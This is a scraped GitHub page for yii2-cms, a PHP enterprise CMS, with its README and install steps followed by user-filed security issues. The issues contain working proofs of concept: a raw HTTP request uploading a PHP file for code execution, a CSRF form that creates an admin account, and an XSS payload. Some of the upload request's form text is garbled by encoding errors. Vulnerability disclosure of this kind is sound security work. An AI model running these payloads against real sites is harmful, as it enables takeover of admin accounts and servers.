weison-tech / yii2-cms Goto Github PK

View Code? Open in Web Editor NEW

186.0 9.0 21.0 7.49 MB

An enterprise application based on yii2 basic template

Home Page: https://mym.pub

License: Other

PHP 85.02% CSS 6.21% JavaScript 8.71% Batchfile 0.06%

yii2 cms enterprise adminlte rbac yii2-cms yii2-enterprise

yii2-cms's Introduction

Yii2 CMS

This is a cms based on yii2 basic template, you can use it to build you own enterprise web site.

Directory structure

assets                   contains all assets files published by Yii2 assetsManager, like js, css, font file and so on.    
protected
    core/
        commands/        contains all commands.
        components/      contains all common components.
        config/          contains all config files.
        libs/            contains common helpers.
        messages/        contains common translation files.
        migrations/      contains common migration files.
        model/           contains common models.
        modules/         contains all core module, such as admin, file, installer module and so on.
        widgets/         contains all common widgets.
    modules/             contains all custom created modules.
    runtime/             contains all runtime files generated by application.
    vendor/              contains all components and extenstions created by composer.
static                        
    css/                 contains some css.
    img/                 contains some img.
    js/                  contains some js.
themes                   
    default/             contains application default themes.
tools/                  
    gulp/                contains js and css compress tool gulp.
uploads/                 contains all upload files.

中文文档

The online backend demo username:admin password:123456 (Please don't update the admin user)

The online frontend demo

Installation

1, Update composer asset plugin.

$ composer global require "fxp/composer-asset-plugin:*"

2, Install yii2 cms code.

$ composer create-project --prefer-dist weison-tech/yii2-cms cms

3, Create database

4, Config you virtual host so that you can visit you site.

5, According to the installation wizard step by step installation.

6, If you use application in product environment, please change the index.php who stored in root folder. when in product environment,you can compress all js and css file to one file.

7, Enter the management background configuration permissions.

8，After the permissions are configured, please modify the protected/core/config/common.php file and comment 'admin/rbac/*' under the 'notCheckPermissionAction' configuration item.

Js and css compress

1, First of all, you should install node js in your computer environment.

2, Install dependencies for this application.

$ cd tools/gulp
$ npm install

3, Use yii2 asset command to compress.

$ cd protected
$ php yii asset core/config/asset.php core/config/assets-prod.php

4, Update you application index file to production environment.

Features

Adminlte template for admin theme.
RBAC management
I18N
News management system
Products management system

...

Preview

Install

Frontend home page

Contact page

Use adminlte as theme, use layerui to define alert, category tree can fold.

Inline editable

Multiple image upload，Drag and drop sort

Change theme

Change language

Contact

Wechat qrcode

Donate

If you want help author to buy pizzas.

Wechat Reward Code

yii2-cms's People

Contributors

Stargazers

Watchers

yii2-cms's Issues

Feedback yii2-cms has an arbitrary file upload vulnerability

后台管理：http://cms.mym.pub/admin/
系统设置->附件设置->设置允许上传类型

案例管理->修改案例->上传相册图上传php文件
php文件内容

返回文件地址，并解析
http://cms.mym.pub/uploads/file/ba4ceee9-0edd-429e-b7c9-c1e3c16855f0/file.php

POC:

POST /file/file/upload.html?fileparam=_fileinput_w2 HTTP/1.1
Host: cms.mym.pub
Content-Length: 4105
Accept: application/json, text/javascript, /; q=0.01
Origin: http://cms.mym.pub
X-CSRF-Token: l2xHPy6dMq0XI3AcIaDDG0jomrA9K0cRFWOQNzmvacfINB5Oevl343xyIyUY8pZ9foPc-mJzNFdgMNl6YZ5Evw==
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfTP81o1cPCbdRvng
Referer: http://cms.mym.pub/products/admin/products/update.html?id=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-HK,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=gp68hjit6kbnd72nsmng8pllij; __admin_identity=29fde27f9d74d644704952c376eda49e0743225903055339da36226197fe5b70a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22__admin_identity%22%3Bi%3A1%3Bs%3A16%3A%22%5B1%2Cnull%2C2592000%5D%22%3B%7D; _csrf=cb8572108f854db47b0292008d760f14f03ae4f36099d6e6efd3d63dc3ee07a8a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22_XYqTdENkQS99RUf6kFJ_XsFuSIMX1-x%22%3B%7D; Hm_lvt_4e97099691e58af0969cfcdcc6b29090=1569545905; Hm_lpvt_4e97099691e58af0969cfcdcc6b29090=1569545905
Connection: close

------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="_csrf"

l2xHPy6dMq0XI3AcIaDDG0jomrA9K0cRFWOQNzmvacfINB5Oevl343xyIyUY8pZ9foPc-mJzNFdgMNl6YZ5Evw==
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[category_id]"

3
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[industry_id]"

8
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[name]"

é¸¿æ��ç§�æ��
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[title]"

é¸¿æ��ç§�æ��å®�ç½�
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[thumb]"

1
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[thumb][order]"

------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[thumb][guid]"

754d55d3-f183-405b-9969-7838274ff86c
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[images]"

------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[description]"

æ·±å�³å¸�é¸¿æ��ç§�æ��æ��é��å�¬å�¸æ��ç«�äº�2015å¹´6æ��ï¼�æ�¯æµ�ä½�æ¸©åº¦æ�§å�¶ç³»ç»�ã��æµ�ä½�ç²�åº¦æµ�é��æ�§å�¶æ�¹æ¡�å��ç�¸å�³è�ªå�¨å��è®¾å¤�ç��ç �å��å��é��å�®ï¼�é��å�®äº§å��å¹¿æ³�åº�ç�¨äº�å�°å�·ã��æ¶�å¸�ã��é� çº¸ã��å��è£�ã��ç�³æ²¹å��å·¥ã��å�¶é��ã��æ©¡è�¶ç�è¡�ä¸�ã��å�¬å�¸ä¸�ç�´è�´å��äº�æ��é«�å®¢æ�·ç��äº§å��è´¨ï¼�æ��é«�æ��ç��ï¼�ä¿�é��ç²¾ç��å��ç��äº§ï¼�å�¯å��å��ç��ç�¨æ�·æ��ä¾�ä¸�ä¸�ã��ä¼�è´¨ã��å¿«æ�·ç��æ��å�¡å��è§£å�³æ�¹æ¡�ã�� æ��ä»¬ä¸�å��ä»¥è¯�ä¸ºæ�¬ï¼�å��ä»·å�¬é��ï¼�æ��ä»£ç��å��ç»�é��ç��äº§å��å��è´¨è¶�ç¾¤ï¼�å�¨å�½å��ä¿¡èª�å��è��ï¼�æ·±å¾�å¹¿å¤§å®¢æ�·ç��ä¿¡èµ�å��æ�¯æ��ã��

æ��ä»¬å°�å��æ��ä»¥äººä¸ºæ�¬ç��ç»�è�¥æ��ç�¥ï¼�å��æ��ä»¥å��ç��ç��æ ¸å¿�ä»·å�¼å®�ä½�ï¼�èµ°ä¸�ä¸�ã��å��è´¨ã��æ��æ�¯ã��æ��å�¡ç��å��å±�ä¹�è·¯ï¼�å�ªå��ä¸ºå®¢æ�·æ��ä¾�æ��ä¼�è�¯ç��äº§å��å��å°½å�¯è�½æ��å®�å��ç��æ��å�¡ã��

æ��ä»¬ç§�æ�¿â��ä¿�è¯�ä¸�æµ�è´¨é��ï¼�ä¿�æ��ä¸�çº§ä¿¡èª�â��ç��ç»�è�¥ç��å¿µï¼�å��æ��â��å®¢æ�·ç¬¬ä¸�â��ç��å��å��ä¸ºå¹¿å¤§å®¢æ�·æ��ä¾�ä¼�è´¨ç��æ��å�¡ï¼�æ¬¢è¿�æ�°è��å®¢æ�·ç��å�¨è¯¢å��ä½�ï¼�

é�¾æ�¥å�°å��ï¼� http://www.hs-te.com

------WebKitFormBoundaryfTP81o1cPCbdRvng Content-Disposition: form-data; name="Products[sort_order]"

0
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="Products[status]"

1
------WebKitFormBoundaryfTP81o1cPCbdRvng
Content-Disposition: form-data; name="_fileinput_w2[]"; filename="phpinfo.php"
Content-Type: application/octet-stream

------WebKitFormBoundaryfTP81o1cPCbdRvng—

There is CSRF vulnerability that can add the administrator account

After the administrator logged in, open the following page

poc:
one.html–--add a adminuser

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://cms.mym.pub/admin/admin/create.html" method="POST">
      <input type="hidden" name="&#95;csrf" value="bPvpzRrFNvX0xUOLMPsjUXClXdKfJsD3qNk&#95;R4VP8bYOl72bVI1xhYexDdF7oU8FPMQ4q8VCh73duEgxtTW&#45;xQ&#61;&#61;" />
      <input type="hidden" name="Admin&#91;username&#93;" value="csrf&#95;test1" />
      <input type="hidden" name="Admin&#91;email&#93;" value="1234&#64;qq&#46;com" />
      <input type="hidden" name="Admin&#91;password&#93;" value="csrf&#95;test1" />
      <input type="hidden" name="Admin&#91;status&#93;" value="2" />
      <input type="hidden" name="Admin&#91;avatar&#93;" value="" />
      <input type="hidden" name="&#95;fileinput&#95;w1" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Checking:

I find a XSS ,poc:"><img src=i onerror=alert("123")>

I find a xss
poc: "><img src=i onerror=alert("123")>
backend

frontend